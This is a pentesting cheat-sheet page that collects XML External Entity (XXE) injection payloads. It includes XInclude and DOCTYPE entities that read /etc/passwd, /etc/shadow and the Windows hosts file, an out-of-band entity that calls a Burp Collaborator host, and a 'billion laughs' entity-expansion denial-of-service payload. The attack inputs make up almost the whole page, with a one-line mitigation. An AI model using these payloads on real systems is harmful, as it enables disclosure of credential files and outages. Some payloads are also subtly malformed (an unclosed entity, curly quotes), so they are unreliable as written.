XXE

XInclude in XXE attack

1
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
2
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Copied!
1
<xi:include xmlns:xi=”http://www.w3.org/2003/XInclude” parse=”text”
2
href=”file://../../../../../../../../Windows/System32/drivers/etc/hosts”>
3
<xi:fallback>Oops!</xi:fallback>
4
</xi:include>
Copied!
Mitigation: If possible disable XML extensions and entities expansion. Add proper rules for XML extensions that enable this same attack like XInclude and xop.
What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy
WebSecAcademy

XXE payloads

Ping

1
<?xml version="1.0" ?>
2
<!DOCTYPE root [
3
<!ENTITY % ext SYSTEM "http://ccccccccccccc.burpcollaborator.net/x">
4
%ext;
5
]>
6
<r></r>
Copied!

File disclosure

1
<?xml version="1.0"?>
2
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
Copied!
1
<!--?xml version="1.0" ?-->
2
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
3
<userInfo>
4
<firstName>John</firstName>
5
<lastName>&ent;</lastName>
6
</userInfo>
Copied!

Denial of Service

1
<!--?xml version="1.0" ?-->
2
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
3
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
4
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
5
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
6
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
7
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
8
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
9
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
10
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
11
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
12
<tag>&lol9;</tag>
Copied!

Resources

GitHub - payloadbox/xxe-injection-payload-list: 🎯 XML External Entity (XXE) Injection Payload List
GitHub
XXE - XEE - XML External Entity
HackTricks
DTD Cheat Sheet
Last modified 1yr ago